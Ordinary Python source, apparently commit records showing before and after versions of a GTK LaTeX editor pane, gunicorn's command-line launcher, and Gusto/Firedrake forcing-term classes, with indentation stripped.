# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
START = "START"
END = "END"
CURRENT = "CURRENT"
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
def __init__(self, config):
self.editorbuffer = gtksourceview2.Buffer()
self.editortags = self.editorbuffer.get_tag_table()
self.manager = gtksourceview2.LanguageManager()
self.searchresults = []
self.searchposition = None
self.errortag = gtk.TextTag()
self.searchtag = gtk.TextTag()
self.configure_texpane(config)
self.textchange = datetime.now()
self.prevchange = datetime.now()
self.check_buffer_changed()
self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
self.editorbuffer.set_modified(False)
def configure_texpane(self, config):
"""Configures the gtksourceview (editor) widget"""
self.language = self.manager.get_language("latex")
self.editorbuffer.set_language(self.language)
self.editorbuffer.set_highlight_matching_brackets(True)
self.editorbuffer.set_highlight_syntax(True)
self.editorviewer = gtksourceview2.View(self.editorbuffer)
self.editorviewer.modify_font \
(pango.FontDescription(config.get_value("editor", "font")))
self.editorviewer.set_show_line_numbers( \
bool(config.get_value("view", "line_numbers")))
self.editorviewer.set_highlight_current_line( \
bool(config.get_value("view", "highlighting")))
textwrap = config.get_value("view", "textwrapping")
wordwrap = config.get_value("view", "wordwrapping")
mode = self.grab_wrapmode(textwrap, wordwrap)
self.editorviewer.set_wrap_mode(mode)
self.errortag.set_property('background', 'red')
self.errortag.set_property('foreground', 'white')
self.searchtag.set_property('background', 'yellow')
def fill_buffer(self, newcontent):
"""Clears the buffer and writes new not-undoable data into it"""
self.editorbuffer.begin_user_action()
self.editorbuffer.set_text("")
self.editorbuffer.begin_not_undoable_action()
start = self.editorbuffer.get_start_iter()
self.editorviewer.set_sensitive(False)
self.editorbuffer.insert(start, newcontent)
self.editorbuffer.set_modified(False)
self.editorviewer.set_sensitive(True)
self.editorbuffer.end_not_undoable_action()
self.editorbuffer.end_user_action()
def grab_buffer(self):
"""Grabs content of the buffer and returns it for writing to file."""
buff = self.editorviewer.get_buffer()
self.editorviewer.set_sensitive(False)
start = self.get_iterator(START)
end = self.get_iterator(END)
content = buff.get_text(start, end)
self.editorviewer.set_sensitive(True)
buff.set_modified(False)
return content
def decode_text(self, filename):
loadfile = open(filename, "r")
content = loadfile.read()
encoding = locale.getdefaultlocale()[1]
try: decoded_content = content.decode(encoding)
except (UnicodeError, TypeError):
try: decoded_content = content.decode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
decoded_content = content.decode("ascii", 'replace')
loadfile.close()
return decoded_content
def encode_text(self, text):
encoding = locale.getdefaultlocale()[1]
try: encoded_content = text.encode(encoding)
except (UnicodeError, TypeError):
try: encoded_content = text.encode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
encoded_content = text.encode("ascii", 'replace')
return encoded_content
def get_iterator(self, tag, search=1):
"""Returns a buffer iterator object for a known position in the buffer
or a custom searchstring. The optional argument search determines
whether iter is placed in front or after the find result"""
if tag == "START":
bufferiter = self.editorbuffer.get_start_iter()
elif tag == "END":
bufferiter = self.editorbuffer.get_end_iter()
elif tag == "CURRENT":
bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
else:
if search == 0:
enditer = self.editorbuffer.get_end_iter()
bufferiter = gtksourceview2.iter_backward_search \
(enditer, tag, flags=0, limit=None)[0]
else:
startiter = self.editorbuffer.get_start_iter()
bufferiter = gtksourceview2.iter_forward_search \
(startiter, tag, flags=0, limit=None)[0]
return bufferiter
def insert_package(self, package):
start_iter = self.get_iterator(START)
end_iter = self.get_iterator(BEGIN, 1)
pkgsearchstr = "{" + package + "}"
pkginsertstr = "\\usepackage{" + package + "}\n"
if gtksourceview2.iter_forward_search \
(start_iter, pkgsearchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, pkginsertstr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def insert_bib(self, package):
start_iter = self.get_iterator(BEGIN)
end_iter = self.get_iterator("\\end{document}", 0)
searchstr = "\\bibliography{"
insertstr = "\\bibliography{" + package + "}{}\n"
stylestr = "\\bibliographystyle{plain}\n"
if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, insertstr + stylestr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def set_selection_textstyle(self, widget):
Formatting.Formatting(widget, self.editorbuffer)
self.set_buffer_changed()
def apply_errortags(self, errorline):
try: #remove the tag from the table if it is in there
self.editortags.remove(self.errortag)
except ValueError: pass
if errorline is not None: #re-add the tag if an error was found
self.editortags.add(self.errortag)
start = self.editorbuffer.get_iter_at_line(errorline-1)
end = self.editorbuffer.get_iter_at_line(errorline)
self.editorbuffer.apply_tag(self.errortag, start, end)
# TODO merge function with apply_errortags (multiple error results soon)
def apply_searchtags(self, searchresults):
try:
self.searchresultiters = []
self.searchposition = 0
self.editortags.remove(self.searchtag)
except ValueError: pass
self.editortags.add(self.searchtag)
for result in searchresults:
self.searchresultiters.append(result)
self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])
def jumpto_searchresult(self, direction):
try:
if self.searchposition + direction < 0:
return False
ins, bnd = self.searchresultiters[self.searchposition + direction]
self.editorbuffer.place_cursor(ins)
self.searchposition = self.searchposition + direction
except (IndexError, TypeError): pass
def start_search(self, term, backwards, wholeword, matchcase=0):
self.searchresults = []
if matchcase is False:
matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
if backwards is True:
self.searchresults = self.search_buffer_backward(term, wholeword, matchcase)
else:
self.searchresults = self.search_buffer_forward(term, wholeword, matchcase)
self.apply_searchtags(self.searchresults)
try:
ins, bound = self.searchresults[0]
self.editorbuffer.place_cursor(ins)
#self.editorbuffer.select_range(ins, bound)
self.editorviewer.scroll_to_iter(ins, 0)
except IndexError: pass #no searchresults
def search_buffer_forward(self, term, wholeword, matchcase):
result_list = []
position = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_forward_search \
(position, term, matchcase, limit=None)
if result:
ins, bound = result
if not wholeword:
result_list.append((ins, bound))
elif wholeword and ins.starts_word() and bound.ends_word():
result_list.append((ins, bound))
else: pass
position = bound
else:
break
return result_list
def search_buffer_backward(self, term, wholeword, matchcase):
result_list = []
position = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_backward_search \
(position, term, matchcase, limit=None)
if result:
ins, bound = result
if not wholeword:
result_list.append((ins, bound))
elif wholeword and ins.starts_word() and bound.ends_word():
result_list.append((ins, bound))
else: pass
position = ins
else:
break
return result_list
def grab_wrapmode(self, textwrap, wordwrap):
if textwrap is False:
return gtk.WRAP_NONE
elif wordwrap is True:
return gtk.WRAP_WORD
else:
return gtk.WRAP_CHAR
def set_buffer_changed(self, *args):
pass
#self.textchange = datetime.now()
def check_buffer_changed(self):
if self.prevchange != self.textchange:
self.prevchange = self.textchange
return True
else:
return False
def undo_change(self):
if self.editorviewer.get_buffer().can_undo():
self.editorviewer.get_buffer().undo()
self.set_buffer_changed()
def redo_change(self):
if self.editorviewer.get_buffer().can_redo():
self.editorviewer.get_buffer().redo()
self.set_buffer_changed()
|
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import grp
import logging
import optparse as op
import os
import pwd
import pkg_resources
import sys
from gunicorn.arbiter import Arbiter
from gunicorn.config import Config
from gunicorn import util, __version__
LOG_LEVELS = {
"critical": logging.CRITICAL,
"error": logging.ERROR,
"warning": logging.WARNING,
"info": logging.INFO,
"debug": logging.DEBUG
}
UMASK = 0
def options():
return [
op.make_option('-c', '--config', dest='config', type='string',
help='Config file. [%default]'),
op.make_option('-b', '--bind', dest='bind',
help='Adress to listen on. Ex. 127.0.0.1:8000 or unix:/tmp/gunicorn.sock'),
op.make_option('-w', '--workers', dest='workers',
help='Number of workers to spawn. [%default]'),
op.make_option('-p','--pid', dest='pidfile',
help='set the background PID FILE'),
op.make_option('-D', '--daemon', dest='daemon', action="store_true",
help='Run daemonized in the background.'),
op.make_option('-m', '--umask', dest="umask", type='int',
help="Define umask of daemon process"),
op.make_option('-u', '--user', dest="user",
help="Change worker user"),
op.make_option('-g', '--group', dest="group",
help="Change worker group"),
op.make_option('--log-level', dest='loglevel',
help='Log level below which to silence messages. [%default]'),
op.make_option('--log-file', dest='logfile',
help='Log to a file. - equals stdout. [%default]'),
op.make_option('-d', '--debug', dest='debug', action="store_true",
default=False, help='Debug mode. only 1 worker.')
]
def configure_logging(opts):
handlers = []
if opts['logfile'] != "-":
handlers.append(logging.FileHandler(opts['logfile']))
else:
handlers.append(logging.StreamHandler())
loglevel = LOG_LEVELS.get(opts['loglevel'].lower(), logging.INFO)
logger = logging.getLogger('gunicorn')
logger.setLevel(loglevel)
for h in handlers:
h.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s %(message)s"))
logger.addHandler(h)
def daemonize(umask):
if not 'GUNICORN_FD' in os.environ:
if os.fork() == 0:
os.setsid()
if os.fork() == 0:
os.umask(umask)
else:
os._exit(0)
else:
os._exit(0)
maxfd = util.get_maxfd()
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(util.REDIRECT_TO, os.O_RDWR)
os.dup2(0, 1)
os.dup2(0, 2)
def set_owner_process(user,group):
if group:
if group.isdigit() or isinstance(group, int):
gid = int(group)
else:
gid = grp.getgrnam(group).gr_gid
os.setgid(gid)
if user:
if user.isdigit() or isinstance(user, int):
uid = int(user)
else:
uid = pwd.getpwnam(user).pw_uid
os.setuid(uid)
def main(usage, get_app):
parser = op.OptionParser(usage=usage, option_list=options(),
version="%prog " + __version__)
opts, args = parser.parse_args()
conf = Config(opts.__dict__)
app = get_app(parser, opts, args)
workers = conf['workers']
addr = conf['address']
kwargs = dict(
config=conf,
debug=conf['debug'],
pidfile=conf['pidfile']
)
arbiter = Arbiter(addr, workers, app, **kwargs)
if conf['daemon']:
daemonize(conf['umask'])
else:
os.setpgrp()
set_owner_process(conf['user'], conf['group'])
configure_logging(conf)
arbiter.run()
def paste_server(app, global_conf=None, host="127.0.0.1", port=None,
*args, **kwargs):
bind_addr = util.parse_address(host, port)
# set others options
debug = kwargs.get('debug')
workers = kwargs.get("workers", 1)
pid = kwargs.get("pid")
daemon = kwargs.get("daemon")
umask = kwargs.get('umask', UMASK)
user = kwargs.get('user')
group = kwargs.get('group')
if global_conf:
workers = int(global_conf.get('workers', workers))
debug = global_conf.get('debug', debug) == "true"
if debug:
# we force to one worker in debug mode.
workers = 1
pid = global_conf.get('pid', pid)
daemon = global_conf.get('daemon', daemonize)
umask = global_conf.get('umask', umask)
user = global_conf.get('user', user)
group = global_conf.get('group', group)
kwargs = dict(
debug=debug,
pidfile=pid
)
arbiter = Arbiter(bind_addr, workers, app, **kwargs)
if daemon == "true":
daemonize(umask)
else:
os.setpgrp()
set_owner_process(user, group)
arbiter.run()
def run():
sys.path.insert(0, os.getcwd())
def get_app(parser, opts, args):
if len(args) != 1:
parser.error("No application module specified.")
try:
return util.import_app(args[0])
except:
parser.error("Failed to import application module.")
main("%prog [OPTIONS] APP_MODULE", get_app)
def run_django():
def settings_notfound(path):
error = "Settings file '%s' not found in current folder.\n" % path
sys.stderr.write(error)
sys.stderr.flush()
sys.exit(1)
def get_app(parser, opts, args):
import django.core.handlers.wsgi
project_path = os.getcwd()
if args:
settings_path = os.path.abspath(os.path.normpath(args[0]))
if not os.path.isfile(settings_path):
settings_notfound(settings_path)
else:
project_path = os.path.dirname(settings_path)
else:
settings_path = os.path.join(project_path, "settings.py")
if not os.path.isfile(settings_path):
settings_notfound(settings_path)
project_name = os.path.split(project_path)[-1]
sys.path.insert(0, project_path)
sys.path.append(os.path.join(project_path, os.pardir))
# set environ
os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name
# django wsgi app
return django.core.handlers.wsgi.WSGIHandler()
main("%prog [OPTIONS] [SETTINGS_PATH]", get_app)
def run_paster():
from paste.deploy import loadapp, loadwsgi
def get_app(parser, opts, args):
if len(args) != 1:
parser.error("No application name specified.")
config_file = os.path.abspath(os.path.normpath(
os.path.join(os.getcwd(), args[0])))
if not os.path.exists(config_file):
parser.error("Config file not found.")
config_url = 'config:%s' % config_file
relative_to = os.path.dirname(config_file)
# load module in sys path
sys.path.insert(0, relative_to)
# add to eggs
pkg_resources.working_set.add_entry(relative_to)
ctx = loadwsgi.loadcontext(loadwsgi.SERVER, config_url,
relative_to=relative_to)
if opts.workers:
workers = opts.workers
else:
workers = int(ctx.local_conf.get('workers', 1))
if not opts.umask:
opts.umask = int(ctx.local_conf.get('umask', UMASK))
if not opts.group:
opts.group = ctx.local_conf.get('group')
if not opts.user:
opts.user = ctx.local_conf.get('user')
if not opts.bind:
host = ctx.local_conf.get('host')
port = ctx.local_conf.get('port')
if host:
if port:
bind = "%s:%s" % (host, port)
else:
bind = host
opts.bind = bind
debug = ctx.global_conf.get('debug') == "true"
if debug:
# we force to one worker in debug mode.
workers = 1
opts.workers=workers
app = loadapp(config_url, relative_to=relative_to)
return app
main("%prog [OPTIONS] pasteconfig.ini", get_app)
we have no defaults in optparse object so set them manually in usage.
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import grp
import logging
import optparse as op
import os
import pwd
import pkg_resources
import sys
from gunicorn.arbiter import Arbiter
from gunicorn.config import Config
from gunicorn import util, __version__
LOG_LEVELS = {
"critical": logging.CRITICAL,
"error": logging.ERROR,
"warning": logging.WARNING,
"info": logging.INFO,
"debug": logging.DEBUG
}
UMASK = 0
def options():
return [
op.make_option('-c', '--config', dest='config', type='string',
help='Config file. [%default]'),
op.make_option('-b', '--bind', dest='bind',
help='Adress to listen on. Ex. 127.0.0.1:8000 or unix:/tmp/gunicorn.sock'),
op.make_option('-w', '--workers', dest='workers',
help='Number of workers to spawn. [1]'),
op.make_option('-p','--pid', dest='pidfile',
help='set the background PID FILE'),
op.make_option('-D', '--daemon', dest='daemon', action="store_true",
help='Run daemonized in the background.'),
op.make_option('-m', '--umask', dest="umask", type='int',
help="Define umask of daemon process"),
op.make_option('-u', '--user', dest="user",
help="Change worker user"),
op.make_option('-g', '--group', dest="group",
help="Change worker group"),
op.make_option('--log-level', dest='loglevel',
help='Log level below which to silence messages. [info]'),
op.make_option('--log-file', dest='logfile',
help='Log to a file. - equals stdout. [-]'),
op.make_option('-d', '--debug', dest='debug', action="store_true",
default=False, help='Debug mode. only 1 worker.')
]
def configure_logging(opts):
handlers = []
if opts['logfile'] != "-":
handlers.append(logging.FileHandler(opts['logfile']))
else:
handlers.append(logging.StreamHandler())
loglevel = LOG_LEVELS.get(opts['loglevel'].lower(), logging.INFO)
logger = logging.getLogger('gunicorn')
logger.setLevel(loglevel)
for h in handlers:
h.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s %(message)s"))
logger.addHandler(h)
def daemonize(umask):
if not 'GUNICORN_FD' in os.environ:
if os.fork() == 0:
os.setsid()
if os.fork() == 0:
os.umask(umask)
else:
os._exit(0)
else:
os._exit(0)
maxfd = util.get_maxfd()
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(util.REDIRECT_TO, os.O_RDWR)
os.dup2(0, 1)
os.dup2(0, 2)
def set_owner_process(user,group):
if group:
if group.isdigit() or isinstance(group, int):
gid = int(group)
else:
gid = grp.getgrnam(group).gr_gid
os.setgid(gid)
if user:
if user.isdigit() or isinstance(user, int):
uid = int(user)
else:
uid = pwd.getpwnam(user).pw_uid
os.setuid(uid)
def main(usage, get_app):
parser = op.OptionParser(usage=usage, option_list=options(),
version="%prog " + __version__)
opts, args = parser.parse_args()
conf = Config(opts.__dict__)
app = get_app(parser, opts, args)
workers = conf['workers']
addr = conf['address']
kwargs = dict(
config=conf,
debug=conf['debug'],
pidfile=conf['pidfile']
)
arbiter = Arbiter(addr, workers, app, **kwargs)
if conf['daemon']:
daemonize(conf['umask'])
else:
os.setpgrp()
set_owner_process(conf['user'], conf['group'])
configure_logging(conf)
arbiter.run()
def paste_server(app, global_conf=None, host="127.0.0.1", port=None,
*args, **kwargs):
bind_addr = util.parse_address(host, port)
# set others options
debug = kwargs.get('debug')
workers = kwargs.get("workers", 1)
pid = kwargs.get("pid")
daemon = kwargs.get("daemon")
umask = kwargs.get('umask', UMASK)
user = kwargs.get('user')
group = kwargs.get('group')
if global_conf:
workers = int(global_conf.get('workers', workers))
debug = global_conf.get('debug', debug) == "true"
if debug:
# we force to one worker in debug mode.
workers = 1
pid = global_conf.get('pid', pid)
daemon = global_conf.get('daemon', daemonize)
umask = global_conf.get('umask', umask)
user = global_conf.get('user', user)
group = global_conf.get('group', group)
kwargs = dict(
debug=debug,
pidfile=pid
)
arbiter = Arbiter(bind_addr, workers, app, **kwargs)
if daemon == "true":
daemonize(umask)
else:
os.setpgrp()
set_owner_process(user, group)
arbiter.run()
def run():
sys.path.insert(0, os.getcwd())
def get_app(parser, opts, args):
if len(args) != 1:
parser.error("No application module specified.")
try:
return util.import_app(args[0])
except:
parser.error("Failed to import application module.")
main("%prog [OPTIONS] APP_MODULE", get_app)
def run_django():
def settings_notfound(path):
error = "Settings file '%s' not found in current folder.\n" % path
sys.stderr.write(error)
sys.stderr.flush()
sys.exit(1)
def get_app(parser, opts, args):
import django.core.handlers.wsgi
project_path = os.getcwd()
if args:
settings_path = os.path.abspath(os.path.normpath(args[0]))
if not os.path.isfile(settings_path):
settings_notfound(settings_path)
else:
project_path = os.path.dirname(settings_path)
else:
settings_path = os.path.join(project_path, "settings.py")
if not os.path.isfile(settings_path):
settings_notfound(settings_path)
project_name = os.path.split(project_path)[-1]
sys.path.insert(0, project_path)
sys.path.append(os.path.join(project_path, os.pardir))
# set environ
os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name
# django wsgi app
return django.core.handlers.wsgi.WSGIHandler()
main("%prog [OPTIONS] [SETTINGS_PATH]", get_app)
def run_paster():
from paste.deploy import loadapp, loadwsgi
def get_app(parser, opts, args):
if len(args) != 1:
parser.error("No application name specified.")
config_file = os.path.abspath(os.path.normpath(
os.path.join(os.getcwd(), args[0])))
if not os.path.exists(config_file):
parser.error("Config file not found.")
config_url = 'config:%s' % config_file
relative_to = os.path.dirname(config_file)
# load module in sys path
sys.path.insert(0, relative_to)
# add to eggs
pkg_resources.working_set.add_entry(relative_to)
ctx = loadwsgi.loadcontext(loadwsgi.SERVER, config_url,
relative_to=relative_to)
if opts.workers:
workers = opts.workers
else:
workers = int(ctx.local_conf.get('workers', 1))
if not opts.umask:
opts.umask = int(ctx.local_conf.get('umask', UMASK))
if not opts.group:
opts.group = ctx.local_conf.get('group')
if not opts.user:
opts.user = ctx.local_conf.get('user')
if not opts.bind:
host = ctx.local_conf.get('host')
port = ctx.local_conf.get('port')
if host:
if port:
bind = "%s:%s" % (host, port)
else:
bind = host
opts.bind = bind
debug = ctx.global_conf.get('debug') == "true"
if debug:
# we force to one worker in debug mode.
workers = 1
opts.workers=workers
app = loadapp(config_url, relative_to=relative_to)
return app
main("%prog [OPTIONS] pasteconfig.ini", get_app)
|
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, Expression, as_vector
class Forcing(object):
"""
Base class for forcing terms for Gusto.
:arg state: x :class:`.State` object.
:arg euler_poincare: if True then the momentum equation is in Euler
Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
If False then this term is not added.
:arg linear: if True then we are solving a linear equation so nonlinear
terms (namely the Euler Poincare term) should not be added.
"""
__metaclass__ = ABCMeta
def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None):
self.state = state
if linear:
self.euler_poincare = False
warning('Setting euler_poincare to False because you have set linear=True')
else:
self.euler_poincare = euler_poincare
self.extra_terms = extra_terms
self._build_forcing_solver()
@abstractmethod
def _build_forcing_solver(self):
pass
@abstractmethod
def apply(self, scale, x, x_nl, x_out, **kwargs):
"""
Function takes x as input, computes F(x_nl) and returns
x_out = x + scale*F(x_nl)
as output.
:arg x: :class:`.Function` object
:arg x_nl: :class:`.Function` object
:arg x_out: :class:`.Function` object
:arg mu_alpha: scale for sponge term, if present
"""
pass
class CompressibleForcing(Forcing):
"""
Forcing class for compressible Euler equations.
"""
def _build_forcing_solver(self):
"""
Only put forcing terms into the u equation.
"""
state = self.state
self.scaling = Constant(1.)
Vu = state.spaces("HDiv")
W = state.W
self.x0 = Function(W) # copy x to here
u0,rho0,theta0 = split(self.x0)
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
Omega = state.Omega
cp = state.parameters.cp
mu = state.mu
n = FacetNormal(state.mesh)
pi = exner(theta0, rho0, state)
a = inner(w,F)*dx
L = self.scaling*(
+ cp*div(theta0*w)*pi*dx # pressure gradient [volume]
- cp*jump(w*theta0,n)*avg(pi)*dS_v # pressure gradient [surface]
)
if state.geopotential_form:
Phi = state.Phi
L += self.scaling*div(w)*Phi*dx # gravity term
else:
g = state.parameters.g
L -= self.scaling*g*inner(w,state.k)*dx # gravity term
if self.euler_poincare:
L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
if Omega is not None:
L -= self.scaling*inner(w,cross(2*Omega,u0))*dx # Coriolis term
if mu is not None:
self.mu_scaling = Constant(1.)
L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
bcs = [DirichletBC(Vu, 0.0, "bottom"),
DirichletBC(Vu, 0.0, "top")]
if self.extra_terms != None:
L += self.scaling*inner(w, self.extra_terms)*dx
u_forcing_problem = LinearVariationalProblem(
a,L,self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.scaling.assign(scaling)
if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
self.mu_scaling.assign(kwargs['mu_alpha'])
self.u_forcing_solver.solve() # places forcing in self.uF
u_out, _, _ = x_out.split()
x_out.assign(x_in)
u_out += self.uF
def exner(theta,rho,state):
"""
Compute the exner function.
"""
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa))
def exner_rho(theta,rho,state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*theta*kappa/(1-kappa)
def exner_theta(theta,rho,state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*rho*kappa/(1-kappa)
class IncompressibleForcing(Forcing):
"""
Forcing class for incompressible Euler Boussinesq equations.
"""
def _build_forcing_solver(self):
"""
Only put forcing terms into the u equation.
"""
state = self.state
self.scaling = Constant(1.)
Vu = state.spaces("HDiv")
W = state.W
self.x0 = Function(W) # copy x to here
u0,p0,b0 = split(self.x0)
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
Omega = state.Omega
mu = state.mu
a = inner(w,F)*dx
L = (
self.scaling*div(w)*p0*dx # pressure gradient
+ self.scaling*b0*inner(w,state.k)*dx # gravity term
)
if self.euler_poincare:
L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
if Omega is not None:
L -= self.scaling*inner(w,cross(2*Omega,u0))*dx # Coriolis term
if mu is not None:
self.mu_scaling = Constant(1.)
L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
bcs = [DirichletBC(Vu, 0.0, "bottom"),
DirichletBC(Vu, 0.0, "top")]
u_forcing_problem = LinearVariationalProblem(
a,L,self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
Vp = state.spaces("DG")
p = TrialFunction(Vp)
q = TestFunction(Vp)
self.divu = Function(Vp)
a = p*q*dx
L = q*div(u0)*dx
divergence_problem = LinearVariationalProblem(
a, L, self.divu)
self.divergence_solver = LinearVariationalSolver(divergence_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.scaling.assign(scaling)
if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
self.mu_scaling.assign(kwargs['mu_alpha'])
self.u_forcing_solver.solve() # places forcing in self.uF
u_out, p_out, _ = x_out.split()
x_out.assign(x_in)
u_out += self.uF
if 'incompressible' in kwargs and kwargs['incompressible']:
self.divergence_solver.solve()
p_out.assign(self.divu)
class EadyForcing(Forcing):
"""
Forcing class for Eady Boussinesq equations.
"""
def _build_forcing_solver(self):
"""
Put forcing terms into the u & b equations.
"""
state = self.state
self.scaling = Constant(1.)
Vu = state.spaces("HDiv")
Vp = state.spaces("DG")
W = state.W
dbdy = state.parameters.dbdy
H = state.parameters.H
eady_exp = Function(Vp).interpolate(Expression(("x[2]-H/2"),H=H))
self.x0 = Function(W) # copy x to here
u0,p0,b0 = split(self.x0)
# u_forcing
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
Omega = state.Omega
mu = state.mu
a = inner(w,F)*dx
L = self.scaling*(
div(w)*p0 # pressure gradient
+ b0*inner(w,state.k) # gravity term
- dbdy*eady_exp*inner(w,as_vector([0.,1.,0.])) # Eady forcing
)*dx
if self.euler_poincare:
L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
if Omega is not None:
L -= self.scaling*inner(w,cross(2*Omega,u0))*dx # Coriolis term
if mu is not None:
self.mu_scaling = Constant(1.)
L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
bcs = [DirichletBC(Vu, 0.0, "bottom"),
DirichletBC(Vu, 0.0, "top")]
u_forcing_problem = LinearVariationalProblem(
a,L,self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
# b_forcing
Vb = state.spaces("HDiv_v")
F = TrialFunction(Vb)
gamma = TestFunction(Vb)
self.bF = Function(Vb)
a = gamma*F*dx
L = -gamma*self.scaling*(dbdy*inner(u0,as_vector([0.,1.,0.])))*dx
b_forcing_problem = LinearVariationalProblem(
a,L,self.bF
)
self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
# divergence_free
Vp = state.spaces("DG")
p = TrialFunction(Vp)
q = TestFunction(Vp)
self.divu = Function(Vp)
a = p*q*dx
L = q*div(u0)*dx
divergence_problem = LinearVariationalProblem(
a, L, self.divu)
self.divergence_solver = LinearVariationalSolver(divergence_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.scaling.assign(scaling)
if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
self.mu_scaling.assign(kwargs['mu_alpha'])
self.u_forcing_solver.solve() # places forcing in self.uF
self.b_forcing_solver.solve() # places forcing in self.bF
u_out, p_out, b_out = x_out.split()
x_out.assign(x_in)
u_out += self.uF
b_out += self.bF
if kwargs.get("incompressible", False):
self.divergence_solver.solve()
p_out.assign(self.divu)
class ShallowWaterForcing(Forcing):
def _build_forcing_solver(self):
state = self.state
g = state.parameters.g
f = state.fields("coriolis")
Vu = state.spaces("HDiv")
W = state.W
self.x0 = Function(W) # copy x to here
u0, D0 = split(self.x0)
n = FacetNormal(state.mesh)
un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
a = inner(w, F)*dx
L = (
(-f*inner(w, state.perp(u0)) + g*div(w)*D0)*dx
- g*inner(jump(w, n), un('+')*D0('+') - un('-')*D0('-'))*dS)
if hasattr(state.fields, "topography"):
b = state.fields("topography")
L += g*div(w)*b*dx - g*inner(jump(w, n), un('+')*b('+') - un('-')*b('-'))*dS
if self.euler_poincare:
L -= 0.5*div(w)*inner(u0, u0)*dx
u_forcing_problem = LinearVariationalProblem(
a, L, self.uF)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.u_forcing_solver.solve() # places forcing in self.uF
self.uF *= scaling
uF, _ = x_out.split()
x_out.assign(x_in)
uF += self.uF
class NoForcing(Forcing):
def _build_forcing_solver(self):
pass
def apply(self, scale, x_in, x_nl, x_out, **kwargs):
x_out.assign(x_in)
fix some lint
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, Expression, as_vector
class Forcing(object):
"""
Base class for forcing terms for Gusto.
:arg state: x :class:`.State` object.
:arg euler_poincare: if True then the momentum equation is in Euler
Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
